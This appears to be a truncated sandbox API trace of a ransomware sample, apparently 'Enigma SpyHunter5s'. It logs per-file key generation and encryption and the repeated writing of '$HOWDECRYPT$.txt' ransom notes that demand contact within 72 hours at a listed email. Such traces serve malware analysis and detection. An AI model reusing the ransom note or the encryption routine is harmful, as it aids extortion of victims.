CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe90*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe90*=0x30) returned 1 [0087.096] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.240] GetProcessHeap () returned 0x2c0000 [0087.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.240] GetProcessHeap () returned 0x2c0000 [0087.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358470 | out: hHeap=0x2c0000) returned 1 [0087.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.241] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.241] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfdc7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfef0, lpOverlapped=0x0 | out: lpBuffer=0x25cfdc7*, lpNumberOfBytesWritten=0x25cfef0*=0x127, lpOverlapped=0x0) returned 1 [0087.242] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.242] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfef0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfef0*=0x2ac, lpOverlapped=0x0) returned 1 [0087.242] CloseHandle (hObject=0x15c) returned 1 [0087.243] GetProcessHeap () returned 0x2c0000 [0087.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353938 | out: hHeap=0x2c0000) returned 1 [0087.243] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe90 | out: pbBuffer=0x25cfe90) returned 1 [0087.243] GetProcessHeap () returned 0x2c0000 [0087.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.243] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe88*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe88*=0x30) returned 1 [0087.243] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.243] GetProcessHeap () returned 0x2c0000 [0087.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.243] GetProcessHeap () returned 0x2c0000 [0087.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354528 | out: hHeap=0x2c0000) returned 1 [0087.243] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe88 | out: pbBuffer=0x25cfe88) returned 1 [0087.243] GetProcessHeap () returned 0x2c0000 [0087.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.243] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe80*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe80*=0x30) returned 1 [0087.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.329] GetProcessHeap () returned 0x2c0000 [0087.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.329] GetProcessHeap () returned 0x2c0000 [0087.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329188 | out: hHeap=0x2c0000) returned 1 [0087.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0087.329] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.329] WriteFile (in: hFile=0xcc, lpBuffer=0x25cfdbb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfee4, lpOverlapped=0x0 | out: lpBuffer=0x25cfdbb*, lpNumberOfBytesWritten=0x25cfee4*=0x127, lpOverlapped=0x0) returned 1 [0087.330] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.330] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfee4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfee4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.330] CloseHandle (hObject=0xcc) returned 1 [0087.331] GetProcessHeap () returned 0x2c0000 [0087.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374300 | out: hHeap=0x2c0000) returned 1 [0087.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe80 | out: pbBuffer=0x25cfe80) returned 1 [0087.331] GetProcessHeap () returned 0x2c0000 [0087.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe78*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe78*=0x30) returned 1 [0087.331] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.352] GetProcessHeap () returned 0x2c0000 [0087.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.353] GetProcessHeap () returned 0x2c0000 [0087.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374218 | out: hHeap=0x2c0000) returned 1 [0087.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.356] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.356] WriteFile (in: hFile=0x170, lpBuffer=0x25cfdb3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfedc, lpOverlapped=0x0 | out: lpBuffer=0x25cfdb3*, lpNumberOfBytesWritten=0x25cfedc*=0x127, lpOverlapped=0x0) returned 1 [0087.357] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.357] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfedc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfedc*=0x2ac, lpOverlapped=0x0) returned 1 [0087.357] CloseHandle (hObject=0x170) returned 1 [0087.357] GetProcessHeap () returned 0x2c0000 [0087.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384c60 | out: hHeap=0x2c0000) returned 1 [0087.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe78 | out: pbBuffer=0x25cfe78) returned 1 [0087.357] GetProcessHeap () returned 0x2c0000 [0087.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe70*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe70*=0x30) returned 1 [0087.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.358] GetProcessHeap () returned 0x2c0000 [0087.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.358] GetProcessHeap () returned 0x2c0000 [0087.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324560 | out: hHeap=0x2c0000) returned 1 [0087.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.358] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.358] WriteFile (in: hFile=0x170, lpBuffer=0x25cfdab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfed4, lpOverlapped=0x0 | out: lpBuffer=0x25cfdab*, lpNumberOfBytesWritten=0x25cfed4*=0x127, lpOverlapped=0x0) returned 1 [0087.360] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.360] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfed4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfed4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.360] CloseHandle (hObject=0x170) returned 1 [0087.360] GetProcessHeap () returned 0x2c0000 [0087.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329548 | out: hHeap=0x2c0000) returned 1 [0087.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe70 | out: pbBuffer=0x25cfe70) returned 1 [0087.360] GetProcessHeap () returned 0x2c0000 [0087.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe68*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe68*=0x30) returned 1 [0087.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.365] GetProcessHeap () returned 0x2c0000 [0087.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.365] GetProcessHeap () returned 0x2c0000 [0087.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329458 | out: hHeap=0x2c0000) returned 1 [0087.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.366] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.366] WriteFile (in: hFile=0x174, lpBuffer=0x25cfda3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfecc, lpOverlapped=0x0 | out: lpBuffer=0x25cfda3*, lpNumberOfBytesWritten=0x25cfecc*=0x127, lpOverlapped=0x0) returned 1 [0087.367] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.367] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfecc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfecc*=0x2ac, lpOverlapped=0x0) returned 1 [0087.367] CloseHandle (hObject=0x174) returned 1 [0087.367] GetProcessHeap () returned 0x2c0000 [0087.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373f60 | out: hHeap=0x2c0000) returned 1 [0087.367] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe68 | out: pbBuffer=0x25cfe68) returned 1 [0087.368] GetProcessHeap () returned 0x2c0000 [0087.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.368] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe60*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe60*=0x30) returned 1 [0087.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.368] GetProcessHeap () returned 0x2c0000 [0087.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.368] GetProcessHeap () returned 0x2c0000 [0087.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373e78 | out: hHeap=0x2c0000) returned 1 [0087.368] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe68 | out: pbBuffer=0x25cfe68) returned 1 [0087.368] GetProcessHeap () returned 0x2c0000 [0087.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.368] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe60*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe60*=0x30) returned 1 [0087.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.368] GetProcessHeap () returned 0x2c0000 [0087.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.368] GetProcessHeap () returned 0x2c0000 [0087.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358880 | out: hHeap=0x2c0000) returned 1 [0087.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe60 | out: pbBuffer=0x25cfe60) returned 1 [0087.369] GetProcessHeap () returned 0x2c0000 [0087.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe58*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe58*=0x30) returned 1 [0087.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.369] GetProcessHeap () returned 0x2c0000 [0087.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.369] GetProcessHeap () returned 0x2c0000 [0087.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3587b0 | out: hHeap=0x2c0000) returned 1 [0087.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe60 | out: pbBuffer=0x25cfe60) returned 1 [0087.369] GetProcessHeap () returned 0x2c0000 [0087.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe58*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe58*=0x30) returned 1 [0087.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.370] GetProcessHeap () returned 0x2c0000 [0087.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.370] GetProcessHeap () returned 0x2c0000 [0087.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3586e0 | out: hHeap=0x2c0000) returned 1 [0087.371] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe58 | out: pbBuffer=0x25cfe58) returned 1 [0087.371] GetProcessHeap () returned 0x2c0000 [0087.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.371] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe50*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe50*=0x30) returned 1 [0087.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.371] GetProcessHeap () returned 0x2c0000 [0087.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.372] GetProcessHeap () returned 0x2c0000 [0087.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358c90 | out: hHeap=0x2c0000) returned 1 [0087.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe58 | out: pbBuffer=0x25cfe58) returned 1 [0087.372] GetProcessHeap () returned 0x2c0000 [0087.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.372] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe50*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, 